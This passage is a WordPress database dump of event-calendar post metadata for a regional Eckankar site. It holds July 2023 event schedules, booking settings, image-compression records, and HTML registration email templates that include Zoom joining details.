INSERT INTO `wpcl_postmeta` VALUES (186854,268745,'mec_event_status','EventScheduled'),(186855,268745,'mec_moved_online_link',''),(186856,268745,'mec_cancelled_reason',''),(186857,268745,'mec_display_cancellation_reason_in_single_page',''),(186858,268745,'protect_children',''),(186859,268745,'passster_activate_global_protection',NULL),(186860,268745,'passster_activate_protection',NULL),(186861,268745,'passster_protection_type','password'),(186862,268745,'boldgrid_hide_page_title','0'),(186863,268745,'_thumbnail_id','266472'),(186864,268745,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(186865,268745,'boldgrid_in_page_containers','1'),(186866,268745,'passster_area_shortcode',''),(186878,268745,'_dp_original','268425'),(186868,268745,'mec_cost_auto_calculate','0'),(186869,268745,'mec_style_per_event','global'),(186870,268745,'mec_trailer_url',''),(186871,268745,'mec_trailer_title',''),(186872,268745,'mec_start_datetime','2023-07-31 07:00 PM'),(186873,268745,'mec_end_datetime','2023-07-31 08:00 PM'),(186874,268745,'mec_sequence','9'),(186875,268745,'mec_event_gallery','a:0:{}'),(186876,268745,'mec_related_events','a:0:{}'),(186877,268745,'mec_banner','a:0:{}'),(186879,268745,'_edit_lock','1688153734:2'),(186880,268745,'_edit_last','2'),(186881,268747,'mec_color',''),(186882,268747,'mec_location_id','185'),(186883,268747,'mec_dont_show_map','0'),(186884,268747,'mec_organizer_id','1'),(186885,268747,'mec_read_more',''),(186886,268747,'mec_more_info',''),(186887,268747,'mec_more_info_title',''),(186888,268747,'mec_more_info_target','_self'),(186889,268747,'mec_cost',''),(186890,268747,'mec_currency','a:0:{}'),(186891,268747,'mec_additional_organizer_ids','a:0:{}'),(186892,268747,'mec_additional_location_ids','a:0:{}'),(186893,268747,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-07-09\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-07-09\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(186894,268747,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(186895,268747,'mec_certain_weekdays','a:0:{}'),(186896,268747,'mec_allday','0'),(186897,268747,'one_occurrence','0'),(186898,268747,'mec_hide_time','0'),(186899,268747,'mec_hide_end_time','0'),(186900,268747,'mec_comment',''),(186901,268747,'mec_timezone','global'),(186902,268747,'mec_countdown_method','global'),(186903,268747,'mec_public','1'),(186904,268747,'mec_start_date','2023-07-09'),(186905,268747,'mec_start_time_hour','10'),(186906,268747,'mec_start_time_minutes','30'),(186907,268747,'mec_start_time_ampm','AM'),(186908,268747,'mec_start_day_seconds','37800'),(186909,268747,'mec_end_date','2023-07-09'),(186910,268747,'mec_end_time_hour','11'),(186911,268747,'mec_end_time_minutes','30'),(186912,268747,'mec_end_time_ampm','AM'),(186913,268747,'mec_end_day_seconds','41400'),(186914,268747,'mec_repeat_status','0'),(186915,268747,'mec_repeat_type',''),(186916,268747,'mec_repeat_interval','1'),(186917,268747,'mec_repeat_end',''),(186918,268747,'mec_repeat_end_at_occurrences',''),(186919,268747,'mec_repeat_end_at_date',''),(186920,268747,'mec_advanced_days','a:0:{}'),(186921,268747,'mec_in_days',''),(186922,268747,'mec_not_in_days',''),(186923,268747,'mec_hourly_schedules','a:0:{}'),(186924,268747,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(186925,268747,'mec_tickets','a:0:{}'),(186926,268747,'mec_fees_global_inheritance','1'),(186927,268747,'mec_fees','a:0:{}'),(186928,268747,'mec_ticket_variations_global_inheritance','1'),(186929,268747,'mec_ticket_variations','a:0:{}'),(186930,268747,'mec_reg_fields_global_inheritance','1'),(186931,268747,'mec_reg_fields','a:0:{}'),(186932,268747,'mec_bfixed_fields','a:0:{}'),(186933,268747,'mec_op','a:0:{}'),(186934,268747,'mec_fields','a:0:{}'),(186935,268747,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(186936,268747,'mec_event_status','EventScheduled'),(186937,268747,'mec_moved_online_link',''),(186938,268747,'mec_cancelled_reason',''),(186939,268747,'mec_display_cancellation_reason_in_single_page',''),(186940,268747,'protect_children',''),(186941,268747,'passster_activate_global_protection',NULL),(186942,268747,'passster_activate_protection',NULL),(186943,268747,'passster_protection_type','password'),(186944,268747,'boldgrid_hide_page_title','0'),(186945,268747,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(186946,268747,'boldgrid_in_page_containers','1'),(186947,268747,'_thumbnail_id','268748'),(186948,268747,'_wp_old_date','2022-04-30'),(186949,268747,'passster_area_shortcode',''),(186961,268747,'_dp_original','268411'),(186951,268747,'mec_cost_auto_calculate','0'),(186952,268747,'mec_style_per_event','global'),(186953,268747,'mec_trailer_url',''),(186954,268747,'mec_trailer_title',''),(186955,268747,'mec_start_datetime','2023-07-09 10:30 AM'),(186956,268747,'mec_end_datetime','2023-07-09 11:30 AM'),(186957,268747,'mec_sequence','18'),(186958,268747,'mec_event_gallery','a:0:{}'),(186959,268747,'mec_related_events','a:0:{}'),(186960,268747,'mec_banner','a:0:{}'),(186962,268747,'_edit_lock','1689025325:2'),(186963,268747,'_edit_last','2'),(186964,268748,'_wp_attached_file','2023/06/bridge-2.jpg'),(186965,268748,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:422;s:4:\"file\";s:20:\"2023/06/bridge-2.jpg\";s:8:\"filesize\";i:73091;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"bridge-2-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18042;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"bridge-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7411;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:20:\"bridge-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23085;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:20:\"bridge-2-500x422.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:422;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48213;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:20:\"bridge-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34736;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:20:\"bridge-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24683;}s:8:\"tileview\";a:5:{s:4:\"file\";s:20:\"bridge-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28472;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(186966,268748,'original-file','2023/06/bridge-2-updraft-pre-smush-original.jpg'),(186967,268748,'smush-complete','1'),(186968,268748,'smush-info','The file was compressed from 71.38 KB to 69.93 KB saving 2.03 percent using WP-Optimize'),(186969,268748,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:73091;s:12:\"smushed-size\";i:71610;s:15:\"savings-percent\";d:2.029999999999999804600747665972448885440826416015625;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:73091;s:10:\"compressed\";i:71610;}s:6:\"medium\";a:2:{s:8:\"original\";i:18042;s:10:\"compressed\";i:18042;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7411;s:10:\"compressed\";i:7345;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:23085;s:10:\"compressed\";i:23085;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:48213;s:10:\"compressed\";i:48213;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:34736;s:10:\"compressed\";i:34736;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:24683;s:10:\"compressed\";i:24683;}s:8:\"tileview\";a:2:{s:8:\"original\";i:28472;s:10:\"compressed\";i:28472;}}}'),(186970,268750,'_wp_attached_file','2023/06/2023-Reg-SA-6.jpg'),(186971,268750,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:804;s:6:\"height\";i:450;s:4:\"file\";s:25:\"2023/06/2023-Reg-SA-6.jpg\";s:8:\"filesize\";i:85737;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-6-350x196.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17014;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5832;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-6-768x430.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:430;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65524;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18335;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-6-500x450.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44287;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-6-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32197;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-6-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22705;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-6-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21142;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(186972,268750,'original-file','2023/06/2023-Reg-SA-6-updraft-pre-smush-original.jpg'),(186973,268750,'smush-complete','1'),(186974,268750,'smush-info','The file was compressed from 83.73 KB to 81.23 KB saving 2.99 percent using WP-Optimize'),(186975,268750,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:85737;s:12:\"smushed-size\";i:83176;s:15:\"savings-percent\";d:2.9900000000000002131628207280300557613372802734375;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:85737;s:10:\"compressed\";i:83176;}s:6:\"medium\";a:2:{s:8:\"original\";i:17014;s:10:\"compressed\";i:16890;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5832;s:10:\"compressed\";i:5766;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:65524;s:10:\"compressed\";i:65366;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:18335;s:10:\"compressed\";i:18335;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:44287;s:10:\"compressed\";i:44112;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:32197;s:10:\"compressed\";i:32105;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:22705;s:10:\"compressed\";i:22628;}s:8:\"tileview\";a:2:{s:8:\"original\";i:21142;s:10:\"compressed\";i:21142;}}}'),(186976,268751,'protect_children',''),(186977,268751,'mec_color',''),(186978,268751,'mec_location_id','185'),(186979,268751,'mec_dont_show_map','0'),(186980,268751,'mec_organizer_id','1'),(186981,268751,'mec_read_more',''),(186982,268751,'mec_more_info',''),(186983,268751,'mec_more_info_title',''),(186984,268751,'mec_more_info_target','_self'),(186985,268751,'mec_cost',''),(186986,268751,'mec_currency','a:0:{}'),(186987,268751,'mec_additional_organizer_ids','a:0:{}'),(186988,268751,'mec_additional_location_ids','a:0:{}'),(186989,268751,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-07-12\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-07-12\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(186990,268751,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(186991,268751,'mec_certain_weekdays','a:0:{}'),(186992,268751,'mec_allday','0'),(186993,268751,'one_occurrence','0'),(186994,268751,'mec_hide_time','0'),(186995,268751,'mec_hide_end_time','0'),(186996,268751,'mec_comment',''),(186997,268751,'mec_timezone','global'),(186998,268751,'mec_countdown_method','global'),(186999,268751,'mec_public','1'),(187000,268751,'mec_start_date','2023-07-12'),(187001,268751,'mec_start_time_hour','10'),(187002,268751,'mec_start_time_minutes','30'),(187003,268751,'mec_start_time_ampm','AM'),(187004,268751,'mec_start_day_seconds','37800'),(187005,268751,'mec_end_date','2023-07-12'),(187006,268751,'mec_end_time_hour','11'),(187007,268751,'mec_end_time_minutes','30'),(187008,268751,'mec_end_time_ampm','AM'),(187009,268751,'mec_end_day_seconds','41400'),(187010,268751,'mec_repeat_status','0'),(187011,268751,'mec_repeat_type',''),(187012,268751,'mec_repeat_interval','1'),(187013,268751,'mec_repeat_end',''),(187014,268751,'mec_repeat_end_at_occurrences',''),(187015,268751,'mec_repeat_end_at_date',''),(187016,268751,'mec_advanced_days','a:0:{}'),(187017,268751,'mec_in_days',''),(187018,268751,'mec_not_in_days',''),(187019,268751,'mec_hourly_schedules','a:0:{}'),(187020,268751,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"rol